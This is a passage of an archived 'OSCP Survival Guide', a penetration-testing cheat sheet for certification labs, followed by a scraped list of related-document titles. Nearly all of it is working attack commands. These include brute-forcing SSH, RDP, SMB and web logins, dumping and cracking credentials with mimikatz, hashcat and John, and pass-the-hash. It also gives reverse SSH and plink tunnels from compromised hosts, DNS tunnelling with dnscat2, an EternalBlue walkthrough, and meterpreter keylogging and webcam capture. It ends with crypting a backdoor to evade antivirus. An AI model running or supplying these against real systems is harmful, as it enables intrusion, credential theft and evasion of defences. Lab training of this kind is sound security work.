https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 25/33
2025/2/21 下午4:03 x89k
Word lists on Kali
cd /usr/share/wordlists
Key-space Brute Force

crunch 6 6 0123456789ABCDEF -o crunch1.txt

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

crunch 8 8 -t ,@@^^%%%

Pwdump and Fgdump - Security Accounts Manager (SAM)

pwdump.exe - attempts to extract password hashes

fgdump.exe - attempts to kill local antiviruses before attempting

to dump the password hashes and cached credentials.

Windows Credential Editor (WCE)

allows one to perform several attacks to obtain clear text

passwords and hashes. Usage: wce -w
Mimikatz

extract plaintexts passwords, hash, PIN code and kerberos

tickets from memory. mimikatz can also perform pass-the-hash,
pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz From metasploit
meterpreter (must have System level access):

meterpreter> load mimikatz

meterpreter> help mimikatz
meterpreter> msv
meterpreter> kerberos
meterpreter> mimikatz_command -f samdump::hashes
meterpreter> mimikatz_command -f sekurlsa::searchPass
words

Password Profiling

cewl can generate a password list from a web page

cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating

John the ripper can mutate password lists

nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Medusa

Medusa, initiated against an htaccess protected web directory

medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack

ncrack (from the makers of nmap) can brute force RDP

ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra

Hydra brute force against SNMP

hydra -P password-file.txt -v $ip snmp

Hydra FTP known user and rockyou password list

hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp

Hydra SSH using list of users and passwords

hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

Hydra SSH using a known password and a username list

hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh

Hydra SSH Against Known username on port 22

hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

Hydra SMTP Brute Force

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Hydra attack http get 401 login with a dictionary

hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

Hydra attack Windows Remote Desktop with rockyou

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 26/33
2025/2/21 下午4:03 x89k
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Hydra brute force SMB user with rockyou:

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

Hydra brute force a Wordpress admin login

hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^

Password Hash Attacks

Online Password Cracking
https://crackstation.net/ http://finder.insidepro.com/

Hashcat Needed to install new drivers to get my GPU Cracking to work

on the Kali linux VM and I also had to use the –force parameter.

apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev

and

apt-get install pocl-opencl-icd

Cracking Linux Hashes - /etc/shadow file

500 | md5crypt $1$, MD5(Unix) | Operat

Cracking Windows Hashes

3000 | LM | Operat
ing-Systems
1000 | NTLM | Operat
ing-Systems

Cracking Common Application Hashes

900 | MD4 | Raw H

ash
0 | MD5 | Raw H
ash
5100 | Half MD5 | Raw H
ash
100 | SHA1 | Raw H
ash
10800 | SHA-384 | Raw H
ash
1400 | SHA-256 | Raw H
ash
1700 | SHA-512 | Raw H
ash

Create a .hash file with all the hashes you want to crack puthasheshere.hash:
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:

hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rock

Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/

Wordpress clear text: test

Hashcat example cracking Wordpress passwords using rockyou:

hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt

Sample Hashes
http://openwall.info/wiki/john/sample-hashes

Identify Hashes

hash-identifier

To crack linux hashes you must first unshadow them:

unshadow passwd-file.txt shadow-file.txt

unshadow passwd-file.txt shadow-file.txt > unshadowed.txt

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 27/33
2025/2/21 下午4:03 x89k
John the Ripper - Password Hash Cracking

john $ip.pwdump

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

john --rules --wordlist=/usr/share/wordlists/rockyou.txt

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

JTR forced descrypt cracking with wordlist

john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt brute force cracking

john --format=descrypt hash --show

Passing the Hash in Windows

Use Metasploit to exploit one of the SMB servers in the labs. Dump the
password hashes and attempt a pass-the-hash attack against another
system:

export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

pth-winexe -U administrator //$ip cmd

Networking, Pivoting and

Tunneling
Port Forwarding - accept traffic on a given IP address and port and redirect it
to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport

w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communication channels

ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

SSH Remote Port Forwarding: Suitable for popping a remote shell on an
internal non routable network

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network
on ANY PORT

ssh -D <local proxy port> -p <remote port> <target>

Proxychains - Perform nmap scan within a DMZ from an external computer

Create reverse SSH tunnel from Popped machine on :2222

ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com

ssh -f -N -R 2222:<local host>:22 root@<remote host>

Create a Dynamic application-level port forward on 8080 thru 2222

ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>

Leverage the SSH SOCKS server to perform Nmap scan on network

using proxy chains

proxychains nmap --top-ports=20 -sT -Pn $ip/24

HTTP Tunneling

nc -vvn $ip 8888

Traffic Encapsulation - Bypassing deep packet inspection

http tunnel
On server side:
sudo hts -F <server ip addr>:<port of your app> 80 On client
side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
network

Tunnel on port 22

plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

Port 22 blocked? Try port 80? or 443?

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 28/33
2025/2/21 下午4:03 x89k
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
(bypass deep packet inspection)

Windows machine add required firewall rules without prompting the

user

netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program=

netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport

netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport

netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport

Start the http tunnel client

httptunnel_client.exe

Create HTTP reverse shell by connecting to localhost port 3000

plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000

VLAN Hopping

git clone https://github.com/nccgroup/vlan-hopping.git

chmod 700 frogger.sh
./frogger.sh

VPN Hacking

Identify VPN servers:

./udp-protocol-scanner.pl -p ike $ip

Scan a range for VPN servers:

./udp-protocol-scanner.pl -p ike -f ip.txt

Use IKEForce to enumerate or dictionary attack VPN servers:

pip install pyip

git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

Use ike-scan to capture the PSK hash:

ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP

Use psk-crack to crack the PSK hash

psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUV
WXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:

nmap –Pn -sV -p 1723 TARGET(S) PPTP Dictionary Attack

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

Port Forwarding/Redirection

PuTTY Link tunnel - SSH Tunneling

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>

SSH Pivoting

SSH pivoting from one network to another:

ssh -D <local host>:1010 -p 22 user@<remote host>

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 29/33
2025/2/21 下午4:03 x89k
DNS Tunneling

dnscat2 supports “download” and “upload” commands for getting iles

(data and programs) to and from the target machine.

Attacking Machine Installation:

apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:

ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:
https://downloads.skullsecurity.org/dnscat2/

https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host <dnscat server ip>

The Metasploit Framework

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:

https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit

MetaSploit requires Postfresql

systemctl start postgresql

To enable Postgresql on startup

systemctl enable postgresql

MSF Syntax

Start metasploit

msfconsole

msfconsole -q

Show help for command

show -h

Show Auxiliary modules

show auxiliary

Use a module

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module

info

Show the configuration parameters for a module

show options

Set options for a module

set RHOSTS 192.168.1.1-254

set THREADS 10

Run the module

run

Execute an Exploit

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 30/33
2025/2/21 下午4:03 x89k
exploit
Search for a module

search type:auxiliary login

Metasploit Database Access

Show all hosts discovered in the MSF database

hosts

Scan for hosts and store them in the MSF database

db_nmap

Search machines for specific ports in MSF database

services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts)

services -p 443 --rhosts

Staged and Non-staged

Non-staged payload - is a payload that is sent in its entirety in one go

Staged - sent in two parts Not have enough buffer space Or need to
bypass antivirus

MS 17-010 - EternalBlue

You may find some boxes that are vulnerable to MS17-010 (AKA.
EternalBlue). Although, not offically part of the indended course, this
exploit can be leveraged to gain SYSTEM level access to a Windows
box. I have never had much luck using the built in Metasploit
EternalBlue module. I found that the elevenpaths version works much
more relabily. Here are the instructions to install it taken from the
following YouTube video: https://www.youtube.com/watch?
v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg –add-architecture i386 && apt-get update && apt-get install
wine32 rm -r ~/.wine wine cmd.exe exit

1. Download the exploit repostory

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

2. Move the exploit to

/usr/share/metasploit-framework/modules/exploits/windows/smb or
~/.msf4/modules/exploits/windows/smb

3. Start metasploit console

I found that using spoolsv.exe as the PROCESSINJECT yielded results

on OSCP boxes.

use exploit/windows/smb/eternalblue_doublepulsar msf

exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST
=> 10.10.10.10 msf exploit(eternalblue_doublepulsar) > set
PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf
exploit(eternalblue_doublepulsar) > run

Experimenting with Meterpreter

Get system information from Meterpreter Shell

sysinfo

Get user id from Meterpreter Shell

getuid

Search for a file

search -f *pass*.txt

Upload a file

upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file

download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell

shell

Exit the meterpreter shell

exit

Metasploit Exploit Multi Handler

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 31/33
2025/2/21 下午4:03 x89k
multi/handler to accept an incoming reverse_https_meterpreter

payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/

Building Your Own MSF Module

mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/mi
sc/gld\_postfix.rb ./crossfire.rb
nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and

Meterpreter Cababilities)

download Download a file or directory

upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database
Meterpreter Post Exploitation Features

Create a Meterpreter background session

background

Bypassing Antivirus Software

Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj
-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.d
ll .
wine hyperion.exe ../backdoor.exe ../crypted.exe

 infosec (2)

 oscp (1)

Share Post x89k

 Twitter  Facebook Python,
C,
 Google+ Reverse

Engineering, Security

← Previous Next →

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 32/33
2025/2/21 下午4:03 x89k

https://archive.is/2019.01.16-232458/https://x89k.cf/infosec/2018/11/03/oscpsurvivalguide.html 33/33

Network Security All-in-one: ASA Firepower WSA Umbrella VPN ISE Layer 2 Security
From Everand
Network Security All-in-one: ASA Firepower WSA Umbrella VPN ISE Layer 2 Security
Redouane MEDDANE
No ratings yet
Oscp Notes
No ratings yet
Oscp Notes
15 pages
RTFM - Red Team Field Manual v3
100% (15)
RTFM - Red Team Field Manual v3
134 pages
Brennon Thomas - The Cyber Plumber's Handbook - The Definitive Guide To SSH Tunneling, Port Redirection, and Bending Traffic Like A Boss.-Opsdisk LLC (2019)
50% (2)
Brennon Thomas - The Cyber Plumber's Handbook - The Definitive Guide To SSH Tunneling, Port Redirection, and Bending Traffic Like A Boss.-Opsdisk LLC (2019)
80 pages
1.basics of Kali - Tools Intro, Commands, Proxychains
100% (2)
1.basics of Kali - Tools Intro, Commands, Proxychains
17 pages
Mastering Proxmox - Second Edition
From Everand
Mastering Proxmox - Second Edition
Wasim Ahmed
No ratings yet
IPv6forDummies PDF
No ratings yet
IPv6forDummies PDF
28 pages
Dr. Ambedkar Institute of Technology: Unit1
67% (3)
Dr. Ambedkar Institute of Technology: Unit1
26 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
52 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
48 pages
OSCP Survival Guide
No ratings yet
OSCP Survival Guide
63 pages
Linux Commands 1
No ratings yet
Linux Commands 1
8 pages
Guide To OSCP in 2021
No ratings yet
Guide To OSCP in 2021
1 page
Download Complete The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas PDF for All Chapters
100% (6)
Download Complete The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas PDF for All Chapters
55 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
14 pages
The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas download
100% (1)
The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas download
61 pages
OSCP Day1
No ratings yet
OSCP Day1
44 pages
The Cyber Plumber S Handbook The Definitive Guide To SSH Tunneling Port Redirection and Bending Traffic Like A Boss Brennon Thomas
100% (6)
The Cyber Plumber S Handbook The Definitive Guide To SSH Tunneling Port Redirection and Bending Traffic Like A Boss Brennon Thomas
52 pages
Buy ebook The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas cheap price
100% (2)
Buy ebook The Cyber Plumber s Handbook The definitive guide to SSH tunneling port redirection and bending traffic like a boss Brennon Thomas cheap price
65 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
10 pages
Linux Commands
No ratings yet
Linux Commands
9 pages
red_team_field_manual-world79.spcs.bio
No ratings yet
red_team_field_manual-world79.spcs.bio
111 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
12 pages
0day Security
No ratings yet
0day Security
30 pages
Red Team Guides
No ratings yet
Red Team Guides
198 pages
Instant download (Ebook) The Cyber Plumber’s Handbook: The definitive guide to SSH tunneling, port redirection, and bending traffic like a boss. by Brennon Thomas pdf all chapter
100% (8)
Instant download (Ebook) The Cyber Plumber’s Handbook: The definitive guide to SSH tunneling, port redirection, and bending traffic like a boss. by Brennon Thomas pdf all chapter
38 pages
Pentest Tips and Tricks #2 – EK
No ratings yet
Pentest Tips and Tricks #2 – EK
16 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
7 pages
Linux Command Cheat Sheet
No ratings yet
Linux Command Cheat Sheet
11 pages
Linux Command Line Quick Ref
No ratings yet
Linux Command Line Quick Ref
7 pages
CPH Version 1.2 20190220 PDF
No ratings yet
CPH Version 1.2 20190220 PDF
80 pages
Cheat Cheet Pentest
No ratings yet
Cheat Cheet Pentest
34 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
12 pages
Zumaroc Notes v2
No ratings yet
Zumaroc Notes v2
36 pages
Malikashish8 Github Io Walkthrough Notes
No ratings yet
Malikashish8 Github Io Walkthrough Notes
19 pages
Linux Commands - A Practica.
No ratings yet
Linux Commands - A Practica.
5 pages
Linux Commands
100% (1)
Linux Commands
8 pages
RTFM - Red Team Field Manual PDF
100% (1)
RTFM - Red Team Field Manual PDF
111 pages
RTFM - Red Team Field Manual
No ratings yet
RTFM - Red Team Field Manual
111 pages
LinuxCommand (1)
No ratings yet
LinuxCommand (1)
6 pages
Linux CLI Cheat Sheet
No ratings yet
Linux CLI Cheat Sheet
6 pages
Linux Command Line Reference
No ratings yet
Linux Command Line Reference
10 pages
Threadsafe Man: Command Description
No ratings yet
Threadsafe Man: Command Description
8 pages
Commandlinefu All
100% (1)
Commandlinefu All
481 pages
Pentest Cheatsheet
No ratings yet
Pentest Cheatsheet
26 pages
Cut & Paste More Linux Commands: Command Description
No ratings yet
Cut & Paste More Linux Commands: Command Description
30 pages
Chemistry
No ratings yet
Chemistry
8 pages
Hacking Notes
No ratings yet
Hacking Notes
11 pages
Lab - CTF - Stapler
No ratings yet
Lab - CTF - Stapler
31 pages
Mastering Python Network Automation: Automating Container Orchestration, Configuration, and Networking with Terraform, Calico, HAProxy, and Istio
From Everand
Mastering Python Network Automation: Automating Container Orchestration, Configuration, and Networking with Terraform, Calico, HAProxy, and Istio
Tim Peters
No ratings yet
Python Networking 101: Navigating essentials of networking, socket programming, AsyncIO, network testing, simulations and Ansible
From Everand
Python Networking 101: Navigating essentials of networking, socket programming, AsyncIO, network testing, simulations and Ansible
Odette Windsor
No ratings yet
Mastering Go Network Automation: Automating Networks, Container Orchestration, Kubernetes with Puppet, Vegeta and Apache JMeter
From Everand
Mastering Go Network Automation: Automating Networks, Container Orchestration, Kubernetes with Puppet, Vegeta and Apache JMeter
Ian Taylor
No ratings yet
Mastering Go Network Automation
From Everand
Mastering Go Network Automation
Ian Taylor
No ratings yet
Learning OpenStack Networking (Neutron), Second Edition: Wield the power of OpenStack Neutron networking to bring network infrastructure and capabilities to your cloud
From Everand
Learning OpenStack Networking (Neutron), Second Edition: Wield the power of OpenStack Neutron networking to bring network infrastructure and capabilities to your cloud
James Denton
No ratings yet
Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide
From Everand
Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide
Allen Lee
4.5/5 (6)
All My IT Tech Posts
From Everand
All My IT Tech Posts
Stephen Edwards
No ratings yet
OpenStack Cloud Security
From Everand
OpenStack Cloud Security
Fabio Alessandro Locati
No ratings yet
OpenStack Networking Essentials
From Everand
OpenStack Networking Essentials
James Denton
No ratings yet
PyQt6 101: A Beginner’s guide to PyQt6
From Everand
PyQt6 101: A Beginner’s guide to PyQt6
Edward Chang
No ratings yet
A Practical Guide Wireshark Forensics
From Everand
A Practical Guide Wireshark Forensics
alasdair gilchrist
5/5 (4)
Rust for Network Programming and Automation, Second Edition: Work around designing networks, TCP/IP protocol, packet analysis and performance monitoring using Rust 1.68
From Everand
Rust for Network Programming and Automation, Second Edition: Work around designing networks, TCP/IP protocol, packet analysis and performance monitoring using Rust 1.68
Gilbert Stew
No ratings yet
Rust for Network Programming and Automation, Second Edition
From Everand
Rust for Network Programming and Automation, Second Edition
Gilbert Stew
No ratings yet
Upnplay Log
No ratings yet
Upnplay Log
82 pages
Lab 5.2.2 - ARP with Wireshark-1
100% (1)
Lab 5.2.2 - ARP with Wireshark-1
5 pages
Network Devices Comparison
No ratings yet
Network Devices Comparison
15 pages
M3UA MAP Netgrps Locupdate
No ratings yet
M3UA MAP Netgrps Locupdate
18 pages
Exercise Sheet 3: © Prof. A. Bachir, Dr. A. Bensalem, Dr. Djouama, Dr. Lagraa, and Dr. Lounis, 2023/2024
No ratings yet
Exercise Sheet 3: © Prof. A. Bachir, Dr. A. Bensalem, Dr. Djouama, Dr. Lagraa, and Dr. Lounis, 2023/2024
4 pages
Crouzet Touch: Quick Start
No ratings yet
Crouzet Touch: Quick Start
37 pages
Module 2: Socket Programming: 8Cspl6241-Advanced Java Programming
No ratings yet
Module 2: Socket Programming: 8Cspl6241-Advanced Java Programming
9 pages
RC_DS_Gazelle S1020i-PWH-GL_202208
No ratings yet
RC_DS_Gazelle S1020i-PWH-GL_202208
7 pages
MPLS - L3VPN
No ratings yet
MPLS - L3VPN
44 pages
Linksys Router Port Forwarding Setup For Geovision DVR
No ratings yet
Linksys Router Port Forwarding Setup For Geovision DVR
2 pages
Get Success in Passing Your Certification Exam at First Attempt!
100% (2)
Get Success in Passing Your Certification Exam at First Attempt!
72 pages
Windows Sever 2008 Network Infrastructure Configuration 70-642
No ratings yet
Windows Sever 2008 Network Infrastructure Configuration 70-642
35 pages
EC-Council: Exam Questions 312-38
100% (1)
EC-Council: Exam Questions 312-38
7 pages
Configure A Channels Connection Type
No ratings yet
Configure A Channels Connection Type
16 pages
Um en SW FL Switch 2000 108998 en 04
No ratings yet
Um en SW FL Switch 2000 108998 en 04
158 pages
validated-reference-design-netscaler-and-amazon-aws
No ratings yet
validated-reference-design-netscaler-and-amazon-aws
43 pages
Comandos Avanzados de Consola para Router HP 3com
No ratings yet
Comandos Avanzados de Consola para Router HP 3com
4 pages
Debian + Proxmox + VYOS + NAT + IPSec + IPTables Fun
No ratings yet
Debian + Proxmox + VYOS + NAT + IPSec + IPTables Fun
17 pages
Listado Contraseñas Impresoras Oki
No ratings yet
Listado Contraseñas Impresoras Oki
2 pages
Assignment 2 Networks Memo
No ratings yet
Assignment 2 Networks Memo
40 pages
Secure Firewall 3100 Series Ds
No ratings yet
Secure Firewall 3100 Series Ds
8 pages
ITCE 314 Lab Report 4
No ratings yet
ITCE 314 Lab Report 4
8 pages
CCNA A Spring 2016 7.3.1.2 Packet Tracer Simulation - Exploration of TCP and UDP Instructions IG
No ratings yet
CCNA A Spring 2016 7.3.1.2 Packet Tracer Simulation - Exploration of TCP and UDP Instructions IG
6 pages
UMGCompare
No ratings yet
UMGCompare
13 pages
SJ-20110624091725-016 ZXR10 8900&8900E (V3.00.01) Series Switch Configuration Guide (Interface Configuration)
No ratings yet
SJ-20110624091725-016 ZXR10 8900&8900E (V3.00.01) Series Switch Configuration Guide (Interface Configuration)
59 pages
Cisco NCS 540
0% (1)
Cisco NCS 540
12 pages
White Paper On Migration From Soft Switch To IMS
No ratings yet
White Paper On Migration From Soft Switch To IMS
8 pages
Ilx1f Canopends301 Manual v201 en
No ratings yet
Ilx1f Canopends301 Manual v201 en
102 pages